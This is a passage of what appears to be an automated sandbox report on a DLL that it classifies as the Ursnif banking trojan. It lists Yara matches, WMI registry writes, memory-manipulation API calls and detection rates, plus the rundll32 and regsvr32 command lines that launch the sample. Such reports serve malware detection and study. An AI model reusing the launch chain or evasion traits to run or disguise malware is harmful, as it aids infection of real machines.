                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 9091.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021B40_2_100021B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AFC00_2_00D4AFC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D47FBE0_2_00D47FBE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4836E0_2_00D4836E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910B680_2_00910B68
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910B6A0_2_00910B6A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD7FBE3_2_02BD7FBE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAFC03_2_02BDAFC0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD836E3_2_02BD836E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40B683_2_00A40B68
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40B6A3_2_00A40B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A47FBE4_2_04A47FBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4AFC04_2_04A4AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4836E4_2_04A4836E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0B684_2_00BD0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0B6A4_2_00BD0B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428836E5_2_0428836E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04287FBE5_2_04287FBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428AFC05_2_0428AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70B6A5_2_00B70B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70B685_2_00B70B68
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000129A NtMapViewOfSection,0_2_1000129A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000119D GetProcAddress,NtCreateSection,memset,0_2_1000119D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_10001540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023D5 NtQueryVirtualMemory,0_2_100023D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00D49A0F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4B1E5 NtQueryVirtualMemory,0_2_00D4B1E5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910541 NtAllocateVirtualMemory,0_2_00910541
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910779 NtProtectVirtualMemory,0_2_00910779
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_02BD9A0F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDB1E5 NtQueryVirtualMemory,3_2_02BDB1E5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40779 NtProtectVirtualMemory,3_2_00A40779
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40541 NtAllocateVirtualMemory,3_2_00A40541
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04A49A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4B1E5 NtQueryVirtualMemory,4_2_04A4B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0779 NtProtectVirtualMemory,4_2_00BD0779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0541 NtAllocateVirtualMemory,4_2_00BD0541
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04289A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04289A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428B1E5 NtQueryVirtualMemory,5_2_0428B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70779 NtProtectVirtualMemory,5_2_00B70779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70541 NtAllocateVirtualMemory,5_2_00B70541
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: 9091.dllStatic PE information: invalid certificate
                      Source: 9091.dllVirustotal: Detection: 22%
                      Source: 9091.dllReversingLabs: Detection: 30%
                      Source: 9091.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9091.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@9/0@16/1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D48F1B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A3 push ecx; ret 0_2_100021B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002150 push ecx; ret 0_2_10002159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AC00 push ecx; ret 0_2_00D4AC09
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4D00C push 00000076h; iretd 0_2_00D4D01A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4E62F push edi; retf 0_2_00D4E630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4E9AC push 0B565A71h; ret 0_2_00D4E9B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AFAF push ecx; ret 0_2_00D4AFBF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910384 push dword ptr [ebp-00000284h]; ret 0_2_00910540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009108B2 push dword ptr [esp+0Ch]; ret 0_2_009108C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009108B2 push dword ptr [esp+10h]; ret 0_2_0091090C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009103B6 push dword ptr [ebp-00000284h]; ret 0_2_00910425
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910725 push edx; ret 0_2_009107C7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910725 push dword ptr [esp+10h]; ret 0_2_009108B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910541 push dword ptr [ebp-00000284h]; ret 0_2_00910577
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910779 push edx; ret 0_2_009107C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDE62F push edi; retf 3_2_02BDE630
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDD00C push 00000076h; iretd 3_2_02BDD01A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAC00 push ecx; ret 3_2_02BDAC09
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDE9AC push 0B565A71h; ret 3_2_02BDE9B1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAFAF push ecx; ret 3_2_02BDAFBF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A408B2 push dword ptr [esp+0Ch]; ret 3_2_00A408C6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A408B2 push dword ptr [esp+10h]; ret 3_2_00A4090C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A403B6 push dword ptr [ebp-00000284h]; ret 3_2_00A40425
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40384 push dword ptr [ebp-00000284h]; ret 3_2_00A40540
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40725 push edx; ret 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40725 push dword ptr [esp+10h]; ret 3_2_00A408B1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40779 push edx; ret 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40541 push dword ptr [ebp-00000284h]; ret 3_2_00A40577
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4E62F push edi; retf 4_2_04A4E630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4AC00 push ecx; ret 4_2_04A4AC09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4D00C push 00000076h; iretd 4_2_04A4D01A
                      Source: 9091.dllStatic PE information: section name: .arthros
                      Source: 9091.dllStatic PE information: section name: .preter
                      Source: 9091.dllStatic PE information: section name: .witched
                      Source: 9091.dllStatic PE information: section name: .restitu
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: 9091.dllStatic PE information: real checksum: 0xc73e4 should be: 0xd0994
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.e